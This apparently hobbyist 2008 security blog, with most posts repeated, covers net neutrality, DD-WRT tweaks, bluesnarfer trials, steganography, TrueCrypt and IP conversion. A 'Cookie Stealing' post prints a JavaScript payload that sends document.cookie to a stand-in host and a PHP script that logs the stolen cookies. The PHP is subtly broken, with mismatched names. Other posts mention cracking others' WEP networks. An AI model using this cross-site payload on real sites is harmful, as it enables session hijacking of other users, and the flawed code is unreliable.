For those of you who have Comcast internet, you may want to take a look at the following:
Comcast to FCC
Also, here's a recent Bill, that google has some say in, that relates to comcast:
Google cheers anti-Comcast legislation
An excerpt from Network Neutrality Wiki:
"Network neutrality (equivalently "net neutrality", "Internet neutrality" or "NN") refers to a principle that is applied to residential broadband networks, and potentially to all networks. Precise definitions vary, but a broadband network free of restrictions on the kinds of equipment that may be attached, on the modes of communication allowed, that does not restrict content, sites, or platforms and where communication is not unreasonably degraded by other communication streams would be considered neutral by most observers.[1][2][3]
The possibility of regulations designed to mandate the neutrality of the Internet has been subject to fierce debate in various fora. Though the term did not enter popular use until several years later, since the early 2000's advocates of net neutrality and associated rules have engaged in mutual campaigns of propaganda with broadband providers over the ability to use "last mile" infrastructure to block opposed internet applications, and content providers (e.g. websites, services, protocols), particularly those served by competitors. Neutrality proponents also claim that telecom companies seek to impose the tiered service model more for the purpose of profiting from their control of the pipeline rather than for any demand for their content or services.[4] Others have stated that they believe net neutrality to be primarily important as a preservation of current freedoms.[5] As Vint Cerf, co-inventor of the Internet Protocol, has stated, "The Internet was designed with no gatekeepers over new content or services. A lightweight but enforceable neutrality rule is needed to ensure that the Internet continues to thrive." [6]
Critics, meanwhile, call net neutrality rules "a solution in search of a problem" and believe that net neutrality rules would reduce incentives to upgrade networks and launch next generation network services.[7] Others argue that discrimination of some kinds, particularly to guarantee "Quality of Service," is not problematic, but highly desirable. Bob Kahn, Internet Protocol's co-inventor, has called the term "net neutrality" a slogan, and states that he opposes establishing it, warning that "nothing interesting can happen inside the net" if it passes: "If the goal is to encourage people to build new capabilities, then the party that takes the lead in building that new capability, is probably only going to have it on their net to start with and it is probably not going to be on anybody else's net.[8]"
In a June 2007 report, the Federal Trade Commission urged restraint with respect to the new regulations proposed by network neutrality advocates, noting the "broadband industry is a relatively young and evolving one," and given no "significant market failure or demonstrated consumer harm from conduct by broadband providers," such regulations "may well have adverse effects on consumer welfare, despite the good intentions of their proponents[9]." In turn, the FTC conclusions have been questioned in Congress, as in September 2007, when Sen. Byron Dorgan, D-N.D., chairman of the Senate interstate commerce, trade and tourism subcommittee, told FTC Chairwoman Deborah Platt Majoras that he feared new services as ground-breaking as Google could not get started in a system with price discrimination.[10]"
Post some comments with your thoughts on network neutrality or lack there of. I want to see how others feel about this subject!
Monday, February 25, 2008
Fun with your DD-WRT
For those that have a DD-WRT flashed router, here are some funs things you can do with it!
First off, here is a firefox addon that will show your routers status in a status bar!
DD-WRT Firefox Addon
Boost your wireless signal
Go to the Wireless tab in the web interface followed by 'Advanced Settings'. Scroll down to the 'FXmit Power' and adjust accordingly(as the DD-WRT manual states, it is "safe" to increase it up to 70) Personally, I wouldn't want to fry my router, so I'd set it at 70 max ;)
QoS
Throttle bandwidth for things that are more important that others such as games over torrents. This is something most routers don't come with, but luckily you have a DD-WRT router right? :D
Cracking WEP
Using wepcrack on your DD-WRT, crack other AP's (please note this should never be done :P) Just set the storage of the capture files to be on a samba mount.
More to come once my brain works a bit more!
First off, here is a firefox addon that will show your routers status in a status bar!
DD-WRT Firefox Addon
Boost your wireless signal
Go to the Wireless tab in the web interface followed by 'Advanced Settings'. Scroll down to the 'FXmit Power' and adjust accordingly(as the DD-WRT manual states, it is "safe" to increase it up to 70) Personally, I wouldn't want to fry my router, so I'd set it at 70 max ;)
QoS
Throttle bandwidth for things that are more important that others such as games over torrents. This is something most routers don't come with, but luckily you have a DD-WRT router right? :D
Cracking WEP
Using wepcrack on your DD-WRT, crack other AP's (please note this should never be done :P) Just set the storage of the capture files to be on a samba mount.
More to come once my brain works a bit more!
Saturday, February 16, 2008
Blue Update!
I just received my bluetooth dongle! Yay! Again, we have the little problem of my phone being verizon thusly can't use OPUSH. So, I can't use bluesnarfer on it. Going to have to find someone with a different carrier and an older phone. But here is me bringing up the device, and playing with bluesnarfer(obviously for those who have used bluesnarfer I'm using the wrong channel, but that was just to test if my phone would even pair with it, which it did and I purposely entered the incorrect pin to cancel it. And for those who haven't played with bluesnarfer, the part where it's saying:
bluesnarfer: open /dev/bluetooth/rfcomm/0, Connection refused
bluesnarfer: bt_rfcomm_config failed
bluesnarfer: unable to create rfcomm connection
bluesnarfer: release rfcomm ok
is because I entered the incorrect pin and it disconnected :D)
Once I find a phone to play with I'll post some tuts on how to use bluesnarfer :D So anyone looking to donate, shoot me an email and we'll talk!
bluesnarfer: open /dev/bluetooth/rfcomm/0, Connection refused
bluesnarfer: bt_rfcomm_config failed
bluesnarfer: unable to create rfcomm connection
bluesnarfer: release rfcomm ok
is because I entered the incorrect pin and it disconnected :D)
Once I find a phone to play with I'll post some tuts on how to use bluesnarfer :D So anyone looking to donate, shoot me an email and we'll talk!
Friday, February 15, 2008
Funny Quote
I was randomly cycling through my normal forums before hitting the sack and ran across a funny quote. A guy and his wife were sitting there, and he looks at her and says "Make me a sandwhich", she says "What? Make it yourself". He then replied, "Sudo Make me a sandwhich" and her response was "Okay." It made me chuckle after reading that. Hopefully a few of you get what happened in the conversation :P
Thursday, February 14, 2008
Cookie Stealing
Let's first start off by describing what this is, how to implement it, and why you need to protect against it.
Cookie Stealing:
Cookie Stealing is composed of two parts: a Sender and a Receiver. The sender is basically just something that sends the cookie to the receiver. How to implement a sender will be discussed later. Now a receiver is something that receives the information from the sender. Although this sounds somewhat simple, it can sometimes be complex.
Implementation:
The following is a sample PHP script for a receiver:
Now, that would be placed on some remote server. For our example we'll be using localhost as to not actually point to someone's site. Now that we have our receiver, we'll move on to a way to get the information sent to it. On to the sender. The following is a snippet that can potentially be used to steal the cookie:
Now the tricky part, is using the above to grab the cookie. This can be done by, say sending the administrator on a site a message(of course js has to be enabled on the site, and allowed. Not to mention the site must contain a user to user messaging system) Now once the administrator opens the message, the script is ran, sending the receiver the current cookie he is using.
Security Risks:
It is quite obvious that this poses a huge security risk. If someone gets a hold of a cookie, they can pose as that user. Which would give them all of the access rights that said user had on the site. For instance, if done to an web admin, the hijacker now has rights to view/delete anything and everything on the website that the admin can from a browser.
*The above information was gathered from multiple websites, but mostly http://www.freakwolfe.cheezyfilms.com/
Cookie Stealing:
Cookie Stealing is composed of two parts: a Sender and a Receiver. The sender is basically just something that sends the cookie to the receiver. How to implement a sender will be discussed later. Now a receiver is something that receives the information from the sender. Although this sounds somewhat simple, it can sometimes be complex.
Implementation:
The following is a sample PHP script for a receiver:
< ? p h p
\\Tells the web server to use php(Please note it isn't filled with spaces normally \\this was done due to restrictions on blogspot)
$hijackedcookie = $HTTP_GET_VARS["cookie"];
\\Takes cookie from the sender and stores it
$file = fopen('cookielog.txt', 'a');
\\Opens the text file and stores it as a variable
fwrite($file, $cookie . "\n\n");
\\Writes the cookie to the text file
?>
\\As with most languages, it has to tell the server it is done with the program it \\was using prior(IE < / h t m l>)
Now, that would be placed on some remote server. For our example we'll be using localhost as to not actually point to someone's site. Now that we have our receiver, we'll move on to a way to get the information sent to it. On to the sender. The following is a snippet that can potentially be used to steal the cookie:
< script language="JavaScript">
document.location="http://localhost/receiver.php?hijackedcookie=" + document.cookie;
< /script>
Now the tricky part, is using the above to grab the cookie. This can be done by, say sending the administrator on a site a message(of course js has to be enabled on the site, and allowed. Not to mention the site must contain a user to user messaging system) Now once the administrator opens the message, the script is ran, sending the receiver the current cookie he is using.
Security Risks:
It is quite obvious that this poses a huge security risk. If someone gets a hold of a cookie, they can pose as that user. Which would give them all of the access rights that said user had on the site. For instance, if done to an web admin, the hijacker now has rights to view/delete anything and everything on the website that the admin can from a browser.
*The above information was gathered from multiple websites, but mostly http://www.freakwolfe.cheezyfilms.com/
Wednesday, February 13, 2008
Extemporaneous Linux haiku
I found this on another blog and it made me laugh, so I figured I'd post it ;)
(1) alloc_bootmem_core
many atomic bitops
it boots very slow
(2) testing to find oops
my tty's can't refresh
big kernel lock held
(3) buffers are dirty
all RAM I malloc'ed is swapped
bdflush won't flush
(4) the disk light flashes
sort by partition offset
all it does is seek
(5) run the test again
it runs ten times slower now
ZONE_DMA's full
(6) O of 1 is good
to get my CPU back
but kernel deadlocks
(7) dbench is not fair
aa somehow goes faster
what's wrong with rmap?
(8) Aunt Tillie is dumb
ESR wants to help her
why lkml?
(9) Athlons have some bugs
phone numbers on IRC
wow AMD called
(10) struct page is bloated
64 gig tries to boot
my kernel panicked
taken from http://csociety.org/pipermail/plug/2002-January/007940.html
(1) alloc_bootmem_core
many atomic bitops
it boots very slow
(2) testing to find oops
my tty's can't refresh
big kernel lock held
(3) buffers are dirty
all RAM I malloc'ed is swapped
bdflush won't flush
(4) the disk light flashes
sort by partition offset
all it does is seek
(5) run the test again
it runs ten times slower now
ZONE_DMA's full
(6) O of 1 is good
to get my CPU back
but kernel deadlocks
(7) dbench is not fair
aa somehow goes faster
what's wrong with rmap?
(8) Aunt Tillie is dumb
ESR wants to help her
why lkml?
(9) Athlons have some bugs
phone numbers on IRC
wow AMD called
(10) struct page is bloated
64 gig tries to boot
my kernel panicked
taken from http://csociety.org/pipermail/plug/2002-January/007940.html
Tuesday, February 12, 2008
Image Steganography
Just as a little insert in between waiting for for my bluetooth usb, I decided to add this little tidbit. This could have just as easily been found on Google, but here it goes. Say you want to send a file to a friend, that you don't want out in the open? How can you do this? Encryption? Yes, but then they have to have a decryption tool. Here's a quick way to do it(on windoze). First, we take the file we want to hide, and zip it up, we'll call it file.zip. Okay, now we download a picture, we'll name it img.jpg. Okay, now, we'll hide this file inside our picture. Image steganography. Here's the windows command to make this easy:
c:\>copy /b img.jpg + file.zip newimg.jpg
Now we have a new file called newimg.jpg, if we open this file, it looks identical to the img.jpg picture we had. But if we look at the filesize, it is a bit larger now isn't it? That is because our zipped file is now inside of it. Let's see if we can get the file out. Using winzip or winrar we open the newimg.jpg file as if it was a normal zip file, and voila. We have our hidden file :D Have fun with this information, and don't do anything I wouldn't do ;)
c:\>copy /b img.jpg + file.zip newimg.jpg
Now we have a new file called newimg.jpg, if we open this file, it looks identical to the img.jpg picture we had. But if we look at the filesize, it is a bit larger now isn't it? That is because our zipped file is now inside of it. Let's see if we can get the file out. Using winzip or winrar we open the newimg.jpg file as if it was a normal zip file, and voila. We have our hidden file :D Have fun with this information, and don't do anything I wouldn't do ;)
Blue Update
Good news bad news. I've successfully hacked my razr v3c and changed a few things. Such as enabling OBEX xfers(usb etc.) and such(although Verizon razr's don't allow 'push' due to not having the right protocols(woot go lame Verizon)) Sweet custom lcd backgrounds and such :D Okay, on to the bad news. Apparently Verizon is using a somewhat newer technology called BREW (Binary Runtime Environment for Wireless) which encrypts the files for each phone making it impossible to transfer said files to another phone(at least not at the moment.) Sweet, cool, thanks Verizon. So anyway, using blooover and such wont' be possible on my phone seeing as it is a Java application, and at this time I haven't been able to find a jar/jad -> brew converter. So, until then, I'll be searching ebay for some cheap BT and Java usable phones to toy with. And my BT usb should be here within the next few days, I'll try bluesnarfer from my pc with that once it arrives.
Saturday, February 9, 2008
Blue...
Well, I've recently been doing research on bluesnarfing, bluebugging, blueprinting, etc. I have just ordered a bluetooth usb device from ebay, and will be testing out some exploits as soon as I receive it. I'll keep you posted on the security holes and such I find as I go through it. Hopefully it will be here by this next weekend. Until then, Live Long and Prosper!
Friday, February 8, 2008
Google Addons
Not much in security, but I decided to add a search engine on the blog to link to google, and search within my blog, in the event it gets large. I also added a banner with content related ads, such as obtaining a CEH, etc. Thought it might be useful for some, if not, oh well, it's there if ya need it :D
Truecrypt
This is the info posted on their site:
I personally love using truecrypt to encrypt data. Especially using Linux at home, and vista at school. This works out perfectly. So say you have something such as passwords and such that you just can't seem to remember. Truecrypt them! You can make a volume(just like in virtualbox, vmware, etc) that is just a file, set to a specific size, then all the data you put in it through Truecrypt is encrypted using whichever algorithm you so choose. Now here comes the fun part. With truecrypt, you can make a volume _WITHIN_ a volume. A "hidden" volume as they call it. Also you can use files as a key, so even if someone gets your "volume" it would be very difficult to get the contents without the "key' files. This is just a little info I thought I would share.
(Please note in some countries the use of encryption is illegal, check your local laws :D)
T r u e C r y p t
Free open-source disk encryption software for Windows Vista/XP , Mac OS X, and Linux
Main Features:
* Creates a virtual encrypted disk within a file and mounts it as a real disk.
* Encrypts an entire hard disk partition or a storage device such as USB flash drive.
* Encryption is automatic, real-time (on-the-fly) and transparent.
* Provides two levels of plausible deniability, in case an adversary forces you to reveal the password:
1) Hidden volume (steganography – more information may be found here).
2) No TrueCrypt volume can be identified (volumes cannot be distinguished from random data).
* Encryption algorithms: AES-256, Serpent, and Twofish. Mode of operation: XTS.
I personally love using truecrypt to encrypt data. Especially using Linux at home, and vista at school. This works out perfectly. So say you have something such as passwords and such that you just can't seem to remember. Truecrypt them! You can make a volume(just like in virtualbox, vmware, etc) that is just a file, set to a specific size, then all the data you put in it through Truecrypt is encrypted using whichever algorithm you so choose. Now here comes the fun part. With truecrypt, you can make a volume _WITHIN_ a volume. A "hidden" volume as they call it. Also you can use files as a key, so even if someone gets your "volume" it would be very difficult to get the contents without the "key' files. This is just a little info I thought I would share.
(Please note in some countries the use of encryption is illegal, check your local laws :D)
Wednesday, February 6, 2008
Well boys and girls, I've lost top place on google. Oh shucks. Don't know how I ended up on #1 to begin with, but oh well. Just thought I'd put that out there. Again it makes no difference in any event.
Tuesday, February 5, 2008
Google Temp Ban
If you kiddies get one of these... You've been berry berry bwad :P Google Temp Ban So, Apparently using "inurl:**** ***** *****"(this isn't what was used as input, but for safety reasons, I'm not going to post the exact code) in google to find open webcams, is something google doesn't like. So, in short, don't do it! And forget you saw this here o.O
As an after thought, I removed the exact google hack, in case any of you try to use it.
As an after thought, I removed the exact google hack, in case any of you try to use it.
Saturday, February 2, 2008
Google.com
I was bored and did a google search for my blog, trying to see how far up it is, and blamo! It's #1 :p IT Security Blog Not all that important, but I thought it was sweet :D Also, to those that actually view this, leave some comments :P Getting bored of logging in and not seeing anything :(
IP Octets (011010010111000000100000011011110110001101110100011001010111010001110011)
First off the binary in the ()'s is ascii binary conversion of ip octets :P Anyhoo, a buddy of mine brought it to my attention last night that most applications can use just three octets as opposed to all four. So it would be w.x.y.z for four correct? I hope you said yes -.- Anyway, so to make it three it would be w.x.y*(256)+z. So we thought hey, how far can we go with this. So we tried making it just two! w.x*(256 squared)+y*(256)+z and it worked! Next I said hey, I'm a genius lets try figuring the math for just one! So, w*(256 cubed)+x*(256 squared)+y*(256)+z. And of course it worked! So I decided to write a shell script for to do this. And here is said script for those of you using *nix instead of windoze:
x="$1"
x1=`echo $x | awk -F . {'print $1'}`
x2=`echo $x | awk -F . {'print $2'}`
x3=`echo $x | awk -F . {'print $3'}`
x4=`echo $x | awk -F . {'print $4'}`
grr=`expr "256" "*" "256" "*" "256"`
y0=`expr "$x1" "*" "$grr"`
y1=`expr "$x2" "*" "65536"`
y2=`expr "$x3" "*" "256"`
outcome3=`expr "$y2" + "$x4"`
outcome2=`expr "$y1" "+" "$y2" + "$x4"`
outcome1=`expr "$y0" + "$y1" "+" "$y2" + "$x4"`
echo "------------------------------------------"
echo "Input IPv4: $x"
echo "------------------------------------------"
echo "Outcome with 3 Octets: $x1.$x2.$outcome3"
echo "Outcome with 2 Octets: $x1.$outcome2"
echo "Outcome with 1 Octets: $outcome1"
x="$1"
x1=`echo $x | awk -F . {'print $1'}`
x2=`echo $x | awk -F . {'print $2'}`
x3=`echo $x | awk -F . {'print $3'}`
x4=`echo $x | awk -F . {'print $4'}`
grr=`expr "256" "*" "256" "*" "256"`
y0=`expr "$x1" "*" "$grr"`
y1=`expr "$x2" "*" "65536"`
y2=`expr "$x3" "*" "256"`
outcome3=`expr "$y2" + "$x4"`
outcome2=`expr "$y1" "+" "$y2" + "$x4"`
outcome1=`expr "$y0" + "$y1" "+" "$y2" + "$x4"`
echo "------------------------------------------"
echo "Input IPv4: $x"
echo "------------------------------------------"
echo "Outcome with 3 Octets: $x1.$x2.$outcome3"
echo "Outcome with 2 Octets: $x1.$outcome2"
echo "Outcome with 1 Octets: $outcome1"
German Trojans
So, apparently the German government, after banning the creation, ownage, and usage of "hacking" software, they decided to create their own Trojan's to deploy to spy on the citizens. They are even thinking of jacking some Skype lines. After speaking about ethics and such, I would say that this is some major BS on their side. That's like the patriot act listening in on our phone conversations and reading our emails. Yeah you can catch a bad guy that way, and get in the lives of the good guys too. I don't think it's very ethical. In my opinion governments need to stay out of the civilians lives. I know they are there to "protect and serve" but I mean come the @#$% on... This is going a bit off topic, but I'm not a big fan of my government prying into my life. Anyway, back on topic. "Hacking" tools are being banned in many countries now. So what will this do? This will make the good guys trying to learn, IE Pen Testers, not be able to keep up with the bad guys. The bad guys that will have these tools whether it's legal or not. In short, government=blah, HACK THE PLANET! -hackers movie :P
Subscribe to:
Posts (Atom)
